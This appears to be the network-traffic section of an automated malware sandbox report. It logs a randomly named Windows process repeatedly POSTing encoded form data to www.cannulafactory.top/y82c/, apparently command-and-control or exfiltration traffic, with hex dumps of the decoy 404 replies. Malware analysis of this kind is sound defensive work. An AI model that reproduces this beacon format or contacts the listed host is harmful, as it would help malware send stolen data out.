                                                Accept-Language: en-us
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Aug 27, 2024 07:59:50.039510012 CEST1289INHTTP/1.1 404 Not Found
                                                Date: Tue, 27 Aug 2024 05:59:49 GMT
                                                Server: Apache
                                                Content-Length: 16052
                                                Connection: close
                                                Content-Type: text/html; charset=utf-8
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                Aug 27, 2024 07:59:50.039612055 CEST1289INData Raw: 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c 61 79 65 72 31 22 3e 0a 20 20 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 67 36 32 31 39 22 0a 20
                                                Data Ascii: "translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="display:inline;fill:#000000;fill-opacity:1
                                                Aug 27, 2024 07:59:50.039664984 CEST1289INData Raw: 39 39 20 7a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 30 2e 32
                                                Data Ascii: 99 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4496" d="m 85.115421,100.5729 c -0.00
                                                Aug 27, 2024 07:59:50.039678097 CEST1289INData Raw: 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 30 30 31 35 37 34 37 35 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 34 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22
                                                Data Ascii: roke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path id="path4513" d="m 74.6875,125.03748 c -8.394789,7.68654 -16.790624,15.37405 -23.988969,22.38484 -7.198345,7.0108 -
                                                Aug 27, 2024 07:59:50.039736986 CEST1289INData Raw: 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e
                                                Data Ascii: ay:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4521" d="m 96.8125,126.22498 c 6.89586,6.45836 13.7917,12.9167 19.98957,19.14
                                                Aug 27, 2024 07:59:50.039794922 CEST1289INData Raw: 32 33 2e 36 36 32 34 38 20 63 20 36 2e 31 35 39 38 38 35 2c 31 31 2e 35 31 37 37 31 20 31 32 2e 33 31 39 39 36 2c 32 33 2e 30 33 35 37 37 20 31 36 2e 38 33 37 32 34 2c 33 31 2e 37 38 39 30 34 20 34 2e 35 31 37 32 38 2c 38 2e 37 35 33 32 37 20 37
                                                Data Ascii: 23.66248 c 6.159885,11.51771 12.31996,23.03577 16.83724,31.78904 4.51728,8.75327 7.29964,14.54985 9.24424,18.32123 1.9446,3.77138 3.00519,5.42118 4.1838,9.19262 1.17861,3.77144 2.47477,9.6631 1.94443,23.80647 -0.53034,14.14338 -2.88706,36.5322
                                                Aug 27, 2024 07:59:50.039869070 CEST1289INData Raw: 34 31 32 34 38 32 2c 31 39 2e 34 34 35 38 35 20 31 2e 30 30 31 37 31 31 2c 33 36 2e 38 38 37 30 31 20 31 2e 35 39 30 39 39 39 2c 35 34 2e 33 32 39 39 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69
                                                Data Ascii: 412482,19.44585 1.001711,36.88701 1.590999,54.32995" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4545"
                                                Aug 27, 2024 07:59:50.039983988 CEST1289INData Raw: 36 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 34 32 2e 34 32 36 34 30 37 2c 31 35 35 2e 33 38 38 32 35 20 63 20 33 2e 34 31 38 34 2c 30 2e 38 32 35 31 33 20 36 2e 38 33 36 30 38 32 2c 31 2e 36 35 30 30 39 20 31 30 2e 36 30 36 39
                                                Data Ascii: 6" d="m 42.426407,155.38825 c 3.4184,0.82513 6.836082,1.65009 10.606997,2.18034 3.770916,0.53024 7.89657,0.76599 11.608535,0.88382 3.711965,0.11782 7.012548,0.11782 10.429711,0.0589 3.417163,-0.0589 6.953769,-0.17681 10.606588,-0.
                                                Aug 27, 2024 07:59:50.040133953 CEST1289INData Raw: 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 36 31 34 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66
                                                Data Ascii: id="path4614" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <ellipse
                                                Aug 27, 2024 07:59:50.040146112 CEST1289INData Raw: 30 2e 31 33 30 31 20 7a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 2d 72 75 6c 65 3a 6e 6f 6e 7a
                                                Data Ascii: 0.1301 z" style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path transform="translate(-170
                                                Aug 27, 2024 07:59:50.204965115 CEST1289INData Raw: 20 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 31 37 30 2e 31 34 35 31 35 2c 2d 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 36 31 30 22 0a
                                                Data Ascii: transform="translate(-170.14515,-0.038164)" id="path4610" d="m 318,180.45184 c 0.66667,0 1.33434,0 1.501,0.16616 0.16667,0.16617 -0.16667,0.49951 0.001,0.66667 0.16767,0.16717 0.68771,0.16717 0.89053,0.3694


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                25192.168.11.204986618.183.3.45807116C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 07:59:55.831015110 CEST832OUTPOST /y82c/ HTTP/1.1
                                                Host: www.cannulafactory.top
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.cannulafactory.top
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 204
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.cannulafactory.top/y82c/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Data Raw: 69 6a 36 30 4d 74 59 3d 68 4a 4b 35 59 31 70 36 7a 72 79 63 63 47 44 56 7a 70 4d 77 69 30 72 45 77 72 7a 51 49 6c 65 62 51 4c 5a 67 38 36 62 7a 2b 6d 77 6b 56 55 37 55 61 32 5a 4b 69 50 77 32 63 44 33 69 59 63 65 6d 55 2b 4a 48 43 31 35 47 68 44 37 57 44 4f 71 61 76 33 73 4f 42 35 39 66 77 68 51 36 6e 31 59 2b 4d 48 31 64 51 32 49 62 47 78 56 58 39 53 33 58 54 74 32 75 31 64 50 32 79 45 55 4d 4b 47 74 65 62 57 79 73 58 4c 69 72 7a 51 59 38 57 62 66 71 44 47 53 62 45 71 58 5a 76 71 49 6a 64 56 45 55 62 77 49 47 69 54 4d 7a 78 47 58 6e 63 2f 4d 72 41 6f 52 4b 78 56 54 69 33 37 56 4b 74 33 6d 4a 47 41 3d 3d
                                                Data Ascii: ij60MtY=hJK5Y1p6zryccGDVzpMwi0rEwrzQIlebQLZg86bz+mwkVU7Ua2ZKiPw2cD3iYcemU+JHC15GhD7WDOqav3sOB59fwhQ6n1Y+MH1dQ2IbGxVX9S3XTt2u1dP2yEUMKGtebWysXLirzQY8WbfqDGSbEqXZvqIjdVEUbwIGiTMzxGXnc/MrAoRKxVTi37VKt3mJGA==
                                                Aug 27, 2024 07:59:56.100285053 CEST1289INHTTP/1.1 404 Not Found
                                                Server: nginx/1.20.1
                                                Date: Tue, 27 Aug 2024 05:59:55 GMT
                                                Content-Type: text/html
                                                Content-Length: 3971
                                                Connection: close
                                                ETag: "6526681e-f83"
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED]
                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #900; color: #fff; font-weight: normal; [TRUNCATED]
                                                Aug 27, 2024 07:59:56.100389957 CEST1289INData Raw: 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 35
                                                Data Ascii: h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #900; font-size: 1.1em;
                                                Aug 27, 2024 07:59:56.100444078 CEST1289INData Raw: 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 33 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 6c 65 72 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e 57 65 62 73 69 74 65 20 41
                                                Data Ascii: is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content"> <p>Something has triggered missing webpage on your website. This
                                                Aug 27, 2024 07:59:56.100456953 CEST277INData Raw: 3d 22 33 32 22 20 2f 3e 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 72 65 64 68 61 74 2e 63 6f 6d 2f 22 3e 3c 69 6d 67 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                Data Ascii: ="32" /></a> <a href="http://www.redhat.com/"><img src="poweredby.png" alt="[ Powered by Red Hat Enterprise Linux ]" width="88" height="31" /></a> </div>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                26192.168.11.204986718.183.3.45807116C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 07:59:58.625627041 CEST1172OUTPOST /y82c/ HTTP/1.1
                                                Host: www.cannulafactory.top
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.cannulafactory.top
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 544
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.cannulafactory.top/y82c/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Data Raw: 69 6a 36 30 4d 74 59 3d 68 4a 4b 35 59 31 70 36 7a 72 79 63 63 6d 54 56 78 49 4d 77 79 6b 72 44 31 72 7a 51 47 46 65 66 51 4c 6c 67 38 2f 69 6f 2b 7a 41 6b 56 32 7a 55 62 30 78 4b 6c 50 77 32 54 6a 33 6e 56 38 65 62 55 2b 31 50 43 30 46 47 68 48 62 57 4e 63 69 61 6e 6e 73 50 56 70 39 63 78 68 51 42 74 56 59 4b 4d 48 4a 33 51 7a 67 62 47 42 35 58 38 51 76 58 46 73 32 76 78 39 50 76 6d 30 55 4e 42 6d 74 51 62 57 75 6b 58 4a 79 52 30 6c 59 38 56 36 2f 71 43 47 53 63 4b 61 57 54 74 71 4a 55 53 56 46 45 55 79 68 30 76 51 6f 7a 78 31 58 2f 58 59 34 35 43 59 31 6c 78 58 72 6e 2b 34 38 46 72 32 6a 31 5a 45 6f 2f 34 4e 53 4a 7a 5a 6f 6a 55 4f 4a 4b 41 32 37 48 71 73 4b 77 43 68 57 37 61 35 7a 66 70 43 51 57 57 5a 51 4a 37 6d 50 68 45 71 41 6c 34 55 6f 61 59 79 64 47 78 55 42 70 44 57 43 4d 66 50 57 73 31 50 6a 71 34 44 6c 36 45 55 76 37 61 32 53 6f 51 54 57 78 74 31 47 46 68 6b 4e 42 68 76 5a 75 74 34 77 38 2b 54 47 6c 73 43 4c 4b 4e 65 4d 49 6f 54 68 6a 6a 4b 70 49 51 4d 6b 33 34 45 6a 41 49 63 6a 38 51 34 [TRUNCATED]
                                                Data Ascii: ij60MtY=hJK5Y1p6zryccmTVxIMwykrD1rzQGFefQLlg8/io+zAkV2zUb0xKlPw2Tj3nV8ebU+1PC0FGhHbWNciannsPVp9cxhQBtVYKMHJ3QzgbGB5X8QvXFs2vx9Pvm0UNBmtQbWukXJyR0lY8V6/qCGScKaWTtqJUSVFEUyh0vQozx1X/XY45CY1lxXrn+48Fr2j1ZEo/4NSJzZojUOJKA27HqsKwChW7a5zfpCQWWZQJ7mPhEqAl4UoaYydGxUBpDWCMfPWs1Pjq4Dl6EUv7a2SoQTWxt1GFhkNBhvZut4w8+TGlsCLKNeMIoThjjKpIQMk34EjAIcj8Q4rLNuxR1ZHIqmBnjOEnlc34PhCAX/3LG+5CaDhizVapOaanydqTQS2IudCG8wFjjOIBvtkq06Z4BMSh5KoEaieod+mVmSfw1vehpojlP0ZPrQQWQKrLOKefP7AQZShDhi1MKzpoov7g8CYUD301lnmGjgpILdtNVY1qqVfPYLbU2f9v2+BvVPOnWCM9BsSYkgfg7yymfB8raCU=
                                                Aug 27, 2024 07:59:58.889554977 CEST1289INHTTP/1.1 404 Not Found
                                                Server: nginx/1.20.1
                                                Date: Tue, 27 Aug 2024 05:59:58 GMT
                                                Content-Type: text/html
                                                Content-Length: 3971
                                                Connection: close
                                                ETag: "6526681e-f83"
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED]
                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #900; color: #fff; font-weight: normal; [TRUNCATED]
                                                Aug 27, 2024 07:59:58.889676094 CEST1289INData Raw: 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 35
                                                Data Ascii: h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #900; font-size: 1.1em;
                                                Aug 27, 2024 07:59:58.889725924 CEST1289INData Raw: 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 33 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 6c 65 72 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e 57 65 62 73 69 74 65 20 41
                                                Data Ascii: is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content"> <p>Something has triggered missing webpage on your website. This
                                                Aug 27, 2024 07:59:58.889777899 CEST277INData Raw: 3d 22 33 32 22 20 2f 3e 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 72 65 64 68 61 74 2e 63 6f 6d 2f 22 3e 3c 69 6d 67 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                Data Ascii: ="32" /></a> <a href="http://www.redhat.com/"><img src="poweredby.png" alt="[ Powered by Red Hat Enterprise Linux ]" width="88" height="31" /></a> </div>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                27192.168.11.204986818.183.3.45807116C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 08:00:01.421161890 CEST1289OUTPOST /y82c/ HTTP/1.1
                                                Host: www.cannulafactory.top
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.cannulafactory.top
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 52932
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.cannulafactory.top/y82c/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Data Raw: 69 6a 36 30 4d 74 59 3d 68 4a 4b 35 59 31 70 36 7a 72 79 63 63 6d 54 56 78 49 4d 77 79 6b 72 44 31 72 7a 51 47 46 65 66 51 4c 6c 67 38 2f 69 6f 2b 79 55 6b 56 6a 6e 55 61 56 78 4b 6b 50 77 32 4e 7a 33 6d 56 38 65 38 55 2b 74 4c 43 30 4a 38 68 42 58 57 4d 4c 4f 61 6e 56 45 50 46 35 39 5a 2f 42 51 35 6e 31 59 65 4d 48 30 67 51 33 49 6c 47 78 39 58 39 53 6e 58 53 50 4f 75 39 4e 50 32 6d 30 56 43 46 6d 73 74 62 57 71 4f 58 4a 2b 52 30 6d 67 38 55 4a 48 71 41 52 4f 63 48 71 57 51 6e 4b 4a 68 62 31 46 4c 55 7a 45 54 76 51 6f 4e 78 30 54 2f 58 66 4d 35 4e 37 74 6d 78 33 72 6e 30 59 38 47 76 32 2f 78 5a 45 30 33 34 4f 4f 4a 7a 61 6f 6a 4f 75 4a 4b 52 69 76 45 36 63 4b 32 51 52 57 67 65 35 4f 53 70 43 30 6f 57 5a 30 4a 38 57 62 68 48 39 63 6c 31 51 63 61 48 69 64 49 2f 30 41 30 4d 32 43 71 66 50 6d 4b 31 50 44 51 34 45 64 36 45 30 50 37 4c 6b 36 72 57 7a 57 4e 75 31 47 51 6c 6b 49 41 68 75 70 4d 74 34 77 73 2b 53 53 6c 73 52 6a 4b 4d 66 4d 4c 71 44 68 75 72 71 70 64 61 73 6f 4c 34 46 50 49 49 64 61 68 51 34 [TRUNCATED]
                                                Data Ascii: ij60MtY=hJK5Y1p6zryccmTVxIMwykrD1rzQGFefQLlg8/io+yUkVjnUaVxKkPw2Nz3mV8e8U+tLC0J8hBXWMLOanVEPF59Z/BQ5n1YeMH0gQ3IlGx9X9SnXSPOu9NP2m0VCFmstbWqOXJ+R0mg8UJHqAROcHqWQnKJhb1FLUzETvQoNx0T/XfM5N7tmx3rn0Y8Gv2/xZE034OOJzaojOuJKRivE6cK2QRWge5OSpC0oWZ0J8WbhH9cl1QcaHidI/0A0M2CqfPmK1PDQ4Ed6E0P7Lk6rWzWNu1GQlkIAhupMt4ws+SSlsRjKMfMLqDhurqpdasoL4FPIIdahQ4fLNOxRw6/LkWBkuuE16M3VPhO2X7P9GKxCInBi5laqL6bg79qVHi2IudP/8wJjj8IBuf8qm914HMSn5KovaiTWd+/2mTvJ1qmho5zlO1ZMgAQpdqr6KKjfP7cYZSxTiVFMJz5osv7j4iYXVH0jy3iKjhBYLewIVa1qrEqXK7Tis8hntsZWd+qIWSQaBfKakAb5zS+cbzYfHSQT37mxDZ0A0pFOON7CBWWIyjj/Z/8jY0IHbSuYgR6nYBYWb3WSh6S3xSl4fZwirobYWNDnZmKUjztnA3084QMiVfwPypxn0YdaEWx+OHrSJWrkFFz7DeM
                                                Aug 27, 2024 08:00:01.421211004 CEST3867OUTData Raw: 4c 64 75 66 2b 44 6d 32 51 71 35 53 51 71 6d 44 6c 49 52 77 75 31 4d 4a 46 4b 58 38 57 75 2b 47 6d 63 76 34 6e 32 54 59 41 37 71 71 37 43 77 78 36 4a 30 59 72 30 66 56 73 32 6e 69 4f 38 70 33 79 6a 76 76 55 39 4d 56 74 38 67 64 77 58 6a 62 71 6b
                                                Data Ascii: Lduf+Dm2Qq5SQqmDlIRwu1MJFKX8Wu+Gmcv4n2TYA7qq7Cwx6J0Yr0fVs2niO8p3yjvvU9MVt8gdwXjbqkGeEyR5iJVNxt7SL/9Y+qIS6O4wtQ2yo5pzJcHzpnkBzuqGE3id7+5Bdoce1OKcv4Lbjxa8g9nS1NGGTRjupr67kEIsjE+AlXzLOvTEJ5a3CumaeTz7RPFS0ufHJ1pOMkCdJpSTt6/3IZTF4mr5nYfakkwfbseWZ7q
                                                Aug 27, 2024 08:00:01.421263933 CEST7734OUTData Raw: 76 46 2f 43 45 51 77 5a 6b 70 52 53 37 72 2b 48 6b 36 62 52 33 30 6f 65 47 42 78 47 77 73 62 59 46 2f 6c 6d 63 37 38 54 76 69 73 72 50 52 45 77 4d 6d 63 36 77 42 55 6f 64 6d 74 6b 38 2b 74 4d 6b 35 6f 33 30 48 66 38 44 36 68 31 63 51 5a 57 49 6d
